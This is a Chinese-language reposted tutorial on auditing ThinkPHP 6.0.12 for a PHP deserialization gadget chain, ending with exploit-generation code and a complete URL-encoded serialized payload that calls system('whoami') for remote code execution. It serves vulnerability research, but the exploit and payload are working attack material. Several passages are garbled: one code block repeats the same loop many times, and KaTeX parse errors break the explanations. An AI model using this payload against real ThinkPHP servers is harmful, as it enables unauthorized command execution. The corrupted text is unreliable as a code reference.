长白山攻防实验室

ThinkPHP V6.0.12LTS 反序列化漏洞的保姆级教程（含exp编写过程）

声明

出品|先知社区(ID:Will1am）

以下内容，来自先知社区的Will1am作者原创，由于传播，利用此文所提供的信息而造成的任何直接或间接的后果和损失，均由使用者本人负责，长白山攻防实验室以及文章作者不承担任何责任。

目录结构

这里是看了w0s1np师傅的目录结构，嘻嘻…

project  应用部署目录
├─application           应用目录（可设置）
│  ├─common             公共模块目录（可更改）
│  ├─index              模块目录(可更改)
│  │  ├─config.php      模块配置文件
│  │  ├─common.php      模块函数文件
│  │  ├─controller      控制器目录
│  │  ├─model           模型目录
│  │  ├─view            视图目录
│  │  └─ ...            更多类库目录
│  ├─command.php        命令行工具配置文件
│  ├─common.php         应用公共（函数）文件
│  ├─config.php         应用（公共）配置文件
│  ├─database.php       数据库配置文件
│  ├─tags.php           应用行为扩展定义文件
│  └─route.php          路由配置文件
├─extend                扩展类库目录（可定义）
├─public                WEB 部署目录（对外访问目录）
│  ├─static             静态资源存放目录(css,js,image)
│  ├─index.php          应用入口文件
│  ├─router.php         快速测试文件
│  └─.htaccess          用于 apache 的重写
├─runtime               应用的运行时目录（可写，可设置）
├─vendor                第三方类库目录（Composer）
├─thinkphp              框架系统目录
│  ├─lang               语言包目录
│  ├─library            框架核心类库目录
│  │  ├─think           Think 类库包目录
│  │  └─traits          系统 Traits 目录
│  ├─tpl                系统模板目录
│  ├─.htaccess          用于 apache 的重写
│  ├─.travis.yml        CI 定义文件
│  ├─base.php           基础定义文件
│  ├─composer.json      composer 定义文件
│  ├─console.php        控制台入口文件
│  ├─convention.php     惯例配置文件
│  ├─helper.php         助手函数文件（可选）
│  ├─LICENSE.txt        授权说明文件
│  ├─phpunit.xml        单元测试配置文件
│  ├─README.md          README 文件
│  └─start.php          框架引导文件
├─build.php             自动生成定义文件（参考）
├─composer.json         composer 定义文件
├─LICENSE.txt           授权说明文件
├─README.md             README 文件
├─think                 命令行入口文件

利用分析

众所周知，wakeup()和destruct()这两种魔术方法在反序列化中是十分重要的存在，在面对这么大量的代码时，我们可以以这两种函数为切入点，来找出反序列化漏洞。

__wakeup() //执行unserialize()时，先会调用这个函数
__destruct() //对象被销毁时调用

找到切入点之后，用seay全局查询一下那里用到了这两种魔术方法

然后就是审计代码找可以利用的点了

hash = spl_object_hash($this);
        static::$safeStorage[$this->hash] = [];
    }
    public function storeSafely($key, $value)
{
        static::$safeStorage[$this->hash][$key] = $value;
    }
    public function retrieveSafely($key)
{
        if (array_key_exists($key, static::$safeStorage[$this->hash])) {
            return static::$safeStorage[$this->hash][$key];
        }
    }
    public function __destruct()
{
        unset(static::$safeStorage[$this->hash]);
    }}

第一个存在这个方法的是一个安全储存的部分，用于登录啥的，不存在我们要寻找的东西。

再看下一段

/**     * Disconnect on destruction.     */    public function __destruct()    {        $this->disconnect();    }

这一块也没啥用，这里的销毁是用于连接断开时销毁，这一块代码主要是关于适配器的，是将某个类的接口转换成客户端期望的另一个接口表示，主要的目的是兼容性，让原本因接口不匹配不能一起工作的两个类可以协同工作。

再看下一段

autosave) {
            $this->save();
        }
    }

根据文件名判断应该也是个差不多的玩意，但是只要$this->autosave为false那么就可以调用save方法

/**     * {@inheritdoc}     */    public function autosave()    {        if ($this->autosave) {            $this->save();        }    }

没啥用继续往下看。

但是继续跟进save方法就没有相关方法了，先放在一边，我们再看下一块。

在vendor\topthink\think-orm\src\Model.php中找到了比较有嫌疑的

/**     * 析构方法     * @access public     */    public function __destruct()    {        if ($this->lazySave) {            $this->save();        }    }}

这里只要让this->lazySave为true就可以成功运行，调用save方法。跟进一下看看save方法是个啥

public function save(array $data = [], string $sequence = null): bool    
{       
  // 数据对象赋值       
   $this->setAttrs($data);       
    if ($this->isEmpty() || false === $this->trigger('BeforeWrite')) {           
     return false;       
      }       
       $result = $this->exists ? $this->updateData() : $this->insertData($sequence);        
       if (false === $result) {           
        return false;      
  }

其中这一句比较关键

if ($this->isEmpty() || false === $this->trigger('BeforeWrite')) {            return false;        }

这里只要this->isEmpty()或false === $this->trigger(‘BeforeWrite’)就会返回false里面一个条件为真才能不直接return，也即需要两个条件：

$this->isEmpty()==false
$this->trigger('BeforeWrite')==true

第一个条件需要继续跟进isEmpty()，我们先放一下，第二个条件是当this触发BeforeWrite的结果是true，再看trigger(‘BeforeWrite’)，位于ModelEvent类中：

protected function trigger(string $event): bool
{   
         if (!$this->withEvent) {          
           return true;     
              }    
                  .....   
    }

让$this->withEvent==false即可满足第二个条件，

我们跟进isEmpty()。

/**     * 判断模型是否为空    
 * @access public     
 * @return bool     
 */    
 public function isEmpty(): bool    
{     
    return empty($this->data);   
  }

可以看到他的作用是判断模型是否为空的，所以只要$this->data不为空就ok

让$this->data!=null即可满足这个条件。

再看这一句

$result = $this->exists ? $this->updateData() : $this->insertData($sequence);

这里的意思是如果this->exists结果为true，那么就采用this->updateData()，

如果不是就采用this->insertData($sequence)

/**     * 设置数据是否存在  
   * @access public     
   * @param bool $exists     
   * @return $this     
   */    
   public function exists(bool $exists = true)   
{       
    $this->exists = $exists;        
    return $this;    
    }

这里可以看到结果是为true的，所以我们跟进updateData()

/**     * 保存写入数据     * @access protected     * @return bool     */    protected function updateData(): bool    {        // 事件回调        if (false === $this->trigger('BeforeUpdate')) {            return false;        }        $this->checkData();        // 获取有更新的数据        $data = $this->getChangedData();        if (empty($data)) {            // 关联更新            if (!empty($this->relationWrite)) {                $this->autoRelationUpdate();            }            return true;        }        if ($this->autoWriteTimestamp && $this->updateTime) {            // 自动写入更新时间            $data[$this->updateTime]       = $this->autoWriteTimestamp();            $this->data[$this->updateTime] = $data[$this->updateTime];        }        // 检查允许字段        $allowFields = $this->checkAllowFields();

这里的话想要执行checkAllowFields()方法需要绕过前面的两个if判断，必须满足两个条件

$this->trigger('BeforeUpdate')==true
$data!=null

第一个条件上面已经满足了，只要关注让data不等于null就可以了

找找data的来源，跟进getChangedData()方法，在

/vendor/topthink/think-orm/src/model/concern/Attribute.php中

/**     * 获取变化的数据 并排除只读数据     * @access public     * @return array     */    public function getChangedData(): array    {        $data = $this->force ? $this->data : array_udiff_assoc($this->data, $this->origin, function ($a, $b) {            if ((empty($a) || empty($b)) && $a !== $b) {                return 1;            }            return is_object($a) || $a != $b ? 1 : 0;        });        // 只读字段不允许更新        foreach ($this->readonly as $key => $field) {            if (array_key_exists($field, $data)) {                unset($data[$field]);            }        }        return $data;    }
$data = $this->force ? $this->data : array_udiff_assoc($this->data, $this->origin, function ($a, $b)

这一句如果this->force结果为true，那么便执行this->data，如果不是那么就会执行

array_udiff_assoc($this->data, $this->origin, function ($a, $b)

但因为force没定义默认为null，所以进入了第二种情况，由于$this->data, $t hi s - > or i g in 默认也不为 n u ll ，所以不符合第一个 i f 判断，最终$ data=0，也即满足前面所提的第二个条件，$data!=null。

然后回到checkAllowFields()方法，查看一下他是如何调用的。

/**     * 检查数据是否允许写入    
 * @access protected     
 * @return array     
 */    protected function checkAllowFields(): array    {        // 检测字段        if (empty($this->field)) {            if (!empty($this->schema)) {                
 $this->field = array_keys(array_merge($this->schema, 
 $this->jsonType));           
  } else {                
  $query = $this->db();                
  $table = $this->table ? $this->table . $this->suffix : $query->getTable();               
   $this->field = $query->getConnection()->getTableFields($table);            }            
   return $this->field;        }       
    $field = $this->field;        
    if ($this->autoWriteTimestamp) {            
    array_push($field, $this->createTime, $this->updateTime);        
    }        
    if (!empty($this->disuse)) {            // 废弃字段            $field = array_diff($field, $this->disuse);        }        
    return $field;    
    }

这里在第10-15行代码中可以看到，如果想进入宗福拼接操作，就需要进入else中，所以我们要使 $this->field = array\_keys(array\_merge($ this->schema, $t hi s - > j so n T y p e)); 不成立，那么就需要让$ this->field=null，$this->schema=null。

在第14行中出现了$this->table . $this->suffix这一字符串拼接，存在可控属性的字符拼接，可以触发\_\_toString魔术方法，把$ this->table设为触发__toString类即可。所以可以找一个有__tostring方法的类做跳板，寻找__tostring，在

/vendor/topthink/think-orm/src/model/concern/Conversion.php中找到了

/**     * 转换当前模型对象为JSON字符串     
* @access public     
* @param  integer $options json参数     
* @return string     
*/    
public function toJson(int $options = JSON_UNESCAPED_UNICODE): string    {        return json_encode($this->toArray(), $options);    }    
public function __toString()    
{        
return $this->toJson();    
}

看来使需要使用toJson()，跟进一下，没找到相关，再看一眼代码，发现第九行中调用了toArray()方法，然后以json格式返回，那我们再看看toArray()方法

public function toArray(): array    {        $item       = [];        $hasVisible = false;        foreach ($this->visible as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]          = explode('.', $val);                    $this->visible[$relation][] = $name;                } else {                    $this->visible[$val] = true;                    $hasVisible          = true;                }                unset($this->visible[$key]);            }        }      
foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }         
foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                } 
 foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据        $data = array_merge($this->data, $this->relation);        foreach ($data as $key => $val) {            if ($val instanceof Model || $val instanceof ModelCollection) {                // 关联模型对象  
 foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据
  foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据
 foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据
 foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据
   foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据
 foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据 
 foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据
  foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据 
   foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据
  foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据 
  foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据 
  foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据
 foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据
  foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据 
  foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据
   foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据
  foreach ($this->hidden as $key => $val) {            if (is_string($val)) {                if (strpos($val, '.')) {                    [$relation, $name]         = explode('.', $val);                    $this->hidden[$relation][] = $name;                } else {                    $this->hidden[$val] = true;                }                unset($this->hidden[$key]);            }        }        // 合并关联数据        $data = array_merge($this->data, $this->relation);        foreach ($data as $key => $val) {            if ($val instanceof Model || $val instanceof ModelCollection) {                // 关联模型对象                if (isset($this->visible[$key]) && is_array($this->visible[$key])) {                    $val->visible($this->visible[$key]);                } elseif (isset($this->hidden[$key]) && is_array($this->hidden[$key])) {                    $val->hidden($this->hidden[$key]);                }                // 关联模型对象                if (!isset($this->hidden[$key]) || true !== $this->hidden[$key]) {                    $item[$key] = $val->toArray();                }            } elseif (isset($this->visible[$key])) {                $item[$key] = $this->getAttr($key);            } elseif (!isset($this->hidden[$key]) && !$hasVisible) {                $item[$key] = $this->getAttr($key);

根据第34行和第44行，第34行是遍历给定的数组语句data数组。每次循环中，当前单元的之被赋给val并且数组内部的指针向前移一步（因此下一次循环中将会得到下一个单元），同时当前单元的键名也会在每次循环中被赋给变量key。第44行是将val和key相关联起来，漏洞方法是getAtrr触发，只需把$data设为数组就行。

在第47和49行中存在getAttr方法，那触发条件是啥呢？

$KaTeX parse error: Undefined control sequence: \[ at position 14: this->visible\̲[̲$ key]需要存在，而 $k ey 来自$ data的键名， $d a t a 又来自$ this->data，即 $t hi s - > d a t a 必须有一个键名传给$ this->visible，然后把键名$key传给getAttr方法，那岂不是默认就能触发…?

跟进getAttr方法

vendor/topthink/think-orm/src/model/concern/Attribute.php

/**     
 * 获取器 获取数据对象的值    
 * @access public     
 * @param  string $name 名称     
 * @return mixed     
 * @throws InvalidArgumentException     
 */    
 public function getAttr(string $name)    {        
 try {            
 $relation = false;            
 $value    = $this->getData($name);        
 } catch (InvalidArgumentException $e) {            
 $relation = $this->isRelationAttr($name);            
 $value    = null;       
  }        
  return $this->getValue($name, $value, $relation);    
  }

在第18行中可以看到漏洞方法是getValue，但传入getValue方法中的$value是由getData方法得到的。

那就进一步跟进getData方法

/**     
* 获取当前对象数据 如果不存在指定字段返回false     
* @access public     
* @param  string $name 字段名 留空获取全部     
* @return mixed     
* @throws InvalidArgumentException     
*/    public function getData(string $name = null)    {        
if (is_null($name)) {            return $this->data;        }        $fieldName = $this->getRealFieldName($name);        
if (array_key_exists($fieldName, $this->data)) {           
 return $this->data[$fieldName];        } 
 elseif (array_key_exists($fieldName, $this->relation)) {           
  return $this->relation[$fieldName];        }        
  throw new InvalidArgumentException('property not exists:' . static::class . '->' . $name);    
  }

可以看到 $t hi s - > d a t a 是可控的（第 16 行），而其中的$ fieldName来自getRealFieldName方法。

跟进getRealFieldName方法

/**     
* 获取实际的字段名     
* @access protected     
* @param  string $name 字段名     
* @return string     
*/    
protected function getRealFieldName(string $name): string    {        
f ($this->convertNameToCamel || !$this->strict) {            
return Str::snake($name);       
 }       
 return $name;   
  }

当 $t hi s - > s t r i c t 为 t r u e 时直接返回$ name，即键名$key

返回getData方法，此时 $f i e l d N am e =$ key，进入if语句，返回 $KaTeX parse error: Undefined control sequence: \[ at position 11: this->data\̲[̲$ key]，再回到getAttr方法，

return $this->getValue($name, $value, $relation);

即返回

return $this->getValue($name, $this->data[$key], $relation);

跟进getValue方法

/**     * 获取经过获取器处理后的数据对象的值     * @access protected     * @param  string      $name 字段名称     * @param  mixed       $value 字段值     * @param  bool|string $relation 是否为关联属性或者关联名     * @return mixed     * @throws InvalidArgumentException     */    protected function getValue(string $name, $value, $relation = false)    {        // 检测属性获取器        $fieldName = $this->getRealFieldName($name);        if (array_key_exists($fieldName, $this->get)) {            return $this->get[$fieldName];        }        $method = 'get' . Str::studly($name) . 'Attr';        if (isset($this->withAttr[$fieldName])) {            if ($relation) {                $value = $this->getRelationValue($relation);            }            if (in_array($fieldName, $this->json) && is_array($this->withAttr[$fieldName])) {                $value = $this->getJsonValue($fieldName, $value);            } else {                $closure = $this->withAttr[$fieldName];                if ($closure instanceof \Closure) {                    $value = $closure($value, $this->data);                }            }        } elseif (method_exists($this, $method)) {            if ($relation) {                $value = $this->getRelationValue($relation);            }

第30行中，如果我们让 $c l os u re 为我们想执行的函数名，$ value和$this->data为参数即可实现任意函数执行。

所以需要查看$closure属性是否可控，跟进getRealFieldName方法，

protected function getRealFieldName(string $name): string   
 { 
       if ($this->convertNameToCamel || !$this->strict) {       
            return Str::snake($name);        
}

如果让 $t hi s - > s t r i c t == t r u e ，即可让$ $f i e l d N am e 等于传入的参数$ name，即开始的 $KaTeX parse error: Undefined control sequence: \[ at position 11: this->data\̲[̲$ key]的键值$key，可控

又因为 $t hi s - > w i t h A tt r 数组可控，所以，$ closure可控，值为

$KaTeX parse error: Undefined control sequence: \[ at position 15: this->withAttr\̲[̲$ key]，参数就是 $t hi s - > d a t a ，即$ data的键值，所以我们需要控制的参数：

$this->data不为空$this->lazySave == true$this->withEvent == false$this->exists == true$this->force == true

EXP编写

捋一下

链子太长了，重新捋一下参数的传递过程，要不就懵了，倒着捋慢慢往前分析

先看__toString()的触发

Conversion::__toString()
Conversion::toJson()
Conversion::toArray() //出现 $this->data 参数
Attribute::getAttr()Attribute::getValue() //出现 $this->json 和 $this->withAttr 参数
Attribute::getJsonValue() // 造成RCE漏洞

首先出现参数可控的点在Conversion::toArray()中（第二行），在这里如果控制 $KaTeX parse error: Undefined control sequence: \[ at position 12: this->data=\̲[̲'whoami'=>\['wh…$ key也就是whoami（19行）

// 合并关联数据        $data = array_merge($this->data, $this->relation);        foreach ($data as $key => $val) {            if ($val instanceof Model || $val instanceof ModelCollection) {                // 关联模型对象                if (isset($this->visible[$key]) && is_array($this->visible[$key])) {                    $val->visible($this->visible[$key]);                } elseif (isset($this->hidden[$key]) && is_array($this->hidden[$key])) {                    $val->hidden($this->hidden[$key]);                }                // 关联模型对象                if (!isset($this->hidden[$key]) || true !== $this->hidden[$key]) {                    $item[$key] = $val->toArray();                }            } elseif (isset($this->visible[$key])) {                $item[$key] = $this->getAttr($key);            } elseif (!isset($this->hidden[$key]) && !$hasVisible) {                $item[$key] = $this->getAttr($key);

然后在Attribute::getAttr()函数中，通过getData()函数从$this->data中拿到了数组中的value后返回

public function getAttr(string $name)   
{       
 try {          
  $relation = false;            
  $value    = $this->getData($name);      
    }
    catch (InvalidArgumentException $e) {         
       $relation = $this->isRelationAttr($name);       
            $value    = null;     
               }      
      return $this->getValue($name, $value, $relation);   
       }

getData()返回的是数组中相应的value，所以第5行的 $t hi s - > g e t D a t a ($ name)也

就是 $t hi s - > g e t D a t a ($ value=[‘whoami’]),在Attribute::getValue()函数中对withAttr和json参数进行了验证

$method = 'get' . Str::studly($name) . 'Attr';        if (isset($this->withAttr[$fieldName])) {            if ($relation) {                $value = $this->getRelationValue($relation);            }            if (in_array($fieldName, $this->json) && is_array($this->withAttr[$fieldName])) {                $value = $this->getJsonValue($fieldName, $value);            } else {

第2行的if语句中需要 $KaTeX parse error: Undefined control sequence: \[ at position 15: this->withAttr\̲[̲$ fieldName]存在的同时需要是一个数组，$this->withAttr[‘whoami’=>[‘system’]]

第7行if语句中中是判断 $f i e l d N am e 是否在$ this->json中，即

in_array($fieldName, $t hi s - > j so n) ，所以只需要$ this->json=[‘whoami’]

接下来分析一下__destruct()的触发过程

Model::__destruct()
Model::save()Model::updateData()Model::checkAllowFields()Model::db() // 触发 __toString()

首先在Model::__destruct()中$this->lazySave需要为true，参数可控

public function __destruct()    {       
 if ($this->lazySave) {         
   $this->save();    
    }   
   }
 }

$this->lazySave=true

然后在Model::save() 需要绕过isEmpty()和$this->exists参数

// 数据对象赋值        
$this->setAttrs($data);        
if ($this->isEmpty() || false === $this->trigger('BeforeWrite')) {  
          return false;       
      }        
   $result = $this->exists ? $this->updateData() : $this->insertData($sequence);        
   if (false === $result) 
   {           
    return false;     
   }

第4行的 $t hi s - > t r i gg er (^{'} B e f ore W r i t e^{'}) 是默认为 t r u e 的，所以只要$ this->data

不为空即可

第8行中如果this->exists结果为true，那么就采用this->updateData()，如果不

是就采用this->insertData($sequence)所以我们需要让this->exists结果为true

那么最后就是Model::db()方法，保证$this->table能触发__toString()（第八行）

public function db($scope = []): Query    {        /** @var Query $query */        $query = self::$db->connect($this->connection)            ->name($this->name . $this->suffix)            ->pk($this->pk);        if (!empty($this->table)) {            $query->table($this->table . $this->suffix);        }

编写

首先Model类是一个抽象类，不能实例化，所以要想利用，得找出Model类的一个子类进行实例化，而且use了刚才__toString 利用过程中使用的接口Conversion和Attribute，所以关键字可以直接用

将上面捋出来的需要的属性全部重新编写

// 保证命名空间的一致namespace think {    // Model需要是抽象类    abstract class Model {        // 需要用到的关键字        private $lazySave = false;        private $data = [];        private $exists = false;        protected $table;        private $withAttr = [];        protected $json = [];        protected $jsonAssoc = false;        // 初始化        public function __construct($obj='') {            $this->lazySave = true;            $this->data = ['whoami'=>['whoami']];            $this->exists = true;            $this->table = $obj;    // 触发__toString            $this->withAttr = ['whoami'=>['system']];            $this->json = ['whoami'];            $this->jsonAssoc = true;        }    }}

全局搜索extends Model，找到一个Pivot类继承了Model

// 保证命名空间的一致namespace think {    // Model需要是抽象类    abstract class Model {        // 需要用到的关键字        private $lazySave = false;        private $data = [];        private $exists = false;        protected $table;        private $withAttr = [];        protected $json = [];        protected $jsonAssoc = false;        // 初始化        public function __construct($obj='') {            $this->lazySave = true;            $this->data = ['whoami'=>['whoami']];            $this->exists = true;            $this->table = $obj;    // 触发__toString            $this->withAttr = ['whoami'=>['system']];            $this->json = ['whoami'];            $this->jsonAssoc = true;        }    }}namespace think\model {    use think\Model;    class Pivot extends Model {    }    // 实例化    $p = new Pivot(new Pivot());

echo urlencode(serialize($p));}O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D

你可能感兴趣的:(代码审计,php,apache,开发语言)

PHP环境搭建详细教程好看资源平台前端 php
PHP是一个流行的服务器端脚本语言，广泛用于Web开发。为了使PHP能够在本地或服务器上运行，我们需要搭建一个合适的PHP环境。本教程将结合最新资料，介绍在不同操作系统上搭建PHP开发环境的多种方法，包括Windows、macOS和Linux系统的安装步骤，以及本地和Docker环境的配置。1.PHP环境搭建概述PHP环境的搭建主要分为以下几类：集成开发环境：例如XAMPP、WAMP、MAMP，这
Java：爬虫框架 dingcho Java java 爬虫
一、ApacheNutch2【参考地址】Nutch是一个开源Java实现的搜索引擎。它提供了我们运行自己的搜索引擎所需的全部工具。包括全文搜索和Web爬虫。Nutch致力于让每个人能很容易,同时花费很少就可以配置世界一流的Web搜索引擎.为了完成这一宏伟的目标,Nutch必须能够做到:每个月取几十亿网页为这些网页维护一个索引对索引文件进行每秒上千次的搜索提供高质量的搜索结果简单来说Nutch支持分
如何用matlab灵活控制feko的求解 NingrLi matlab 开发语言
https://bbs.rfeda.cn/read.php?tid=3778Feko中的模型和求解设置等都可以通过editfeko进行设置，其文件存储为.pre文件，该文件可以用文本打开，因此，我们可以通过VB、VC、matlab等工具对.pre文件进行读写操作，以达到更灵活的使用feko。同样，对于.out文件，我们也可以进行读操作。熟练使用对.pre文件和.out文件的操作后，我们可以方便的计
进销存小程序源码 PHP网络版ERP进销存管理系统全开源可二开摸鱼小号 php
可直接源码搭建部署发布后使用：一、功能模块介绍该系统模板主要有进，销，存三个主要模板功能组成，下面将介绍各模块所对应的功能；进：需要将产品采购入库，自动生成采购明细台账同时关联财务生成付款账单；销：是指对客户的销售订单记录，汇总生成产品销售明细及回款计划；存：库存的日常盘点与统计，库存下限预警、出入库台账、库存位置等。1.进购管理采购订单：采购下单审批→由上级审批通过采购入库；采购入库：货品到货>
计算机毕业设计PHP仓储综合管理系统（源码+程序+VUE+lw+部署） java毕设程序源码王哥 php 课程设计 vue.js
该项目含有源码、文档、程序、数据库、配套开发软件、软件安装教程。欢迎交流项目运行环境配置：phpStudy+Vscode+Mysql5.7+HBuilderX+Navicat11+Vue+Express。项目技术：原生PHP++Vue等等组成，B/S模式+Vscode管理+前后端分离等等。环境需要1.运行环境：最好是小皮phpstudy最新版，我们在这个版本上开发的。其他版本理论上也可以。2.开发
最简单将静态网页挂载到服务器上(不用nginx) 全能全知者服务器 nginx 运维前端 html 笔记
最简单将静态网页挂载到服务器上(不用nginx)如果随便弄个静态网页挂在服务器都要用nignx就太麻烦了，所以直接使用Apache来搭建一些简单前端静态网页会相对方便很多检查Web服务器服务状态：sudosystemctlstatushttpd#ApacheWeb服务器如果发现没有安装web服务器：安装Apache：sudoyuminstallhttpd启动Apache：sudosystemctl
浅谈MapReduce Android路上的人 Hadoop 分布式计算 mapreduce 分布式框架 hadoop
从今天开始，本人将会开始对另一项技术的学习，就是当下炙手可热的Hadoop分布式就算技术。目前国内外的诸多公司因为业务发展的需要，都纷纷用了此平台。国内的比如BAT啦，国外的在这方面走的更加的前面，就不一一列举了。但是Hadoop作为Apache的一个开源项目，在下面有非常多的子项目，比如HDFS，HBase,Hive，Pig,等等，要先彻底学习整个Hadoop，仅仅凭借一个的力量，是远远不够的。
Hadoop 傲雪凌霜，松柏长青后端大数据 hadoop 大数据分布式
ApacheHadoop是一个开源的分布式计算框架，主要用于处理海量数据集。它具有高度的可扩展性、容错性和高效的分布式存储与计算能力。Hadoop核心由四个主要模块组成，分别是HDFS（分布式文件系统）、MapReduce（分布式计算框架）、YARN（资源管理）和HadoopCommon（公共工具和库）。1.HDFS（HadoopDistributedFileSystem）HDFS是Hadoop生
maven-assembly-plugin 打包实例带着二娃去遛弯
1.先在pom.xml文件中添加assembly打包插件org.apache.maven.pluginsmaven-assembly-plugin2.6assembly/assembly.xmlmake-assemblypackagesingle说明:1.需要修改的可能就是descriptors标签下面的打包配置文件目录,指定assembly.xml的路径.2.可以添加多个打包配置文件,进行多种形
Github 2024-09-12 Go开源项目日报Top10 老孙正经胡说 github golang 开源 Github趋势分析开源项目 Python Golang
根据GithubTrendings的统计，今日(2024-09-12统计)共有10个项目上榜。根据开发语言中项目的数量，汇总情况如下：开发语言项目数量Go项目10C项目1Terraform：基础设施即代码的开源工具创建周期：3626天开发语言：Go协议类型：OtherStar数量：40393个Fork数量：9397次关注人数：40393人贡献人数：358人OpenIssues数量：1943个Git
Kafka详细解析与应用分析芊言芊语 kafka 分布式
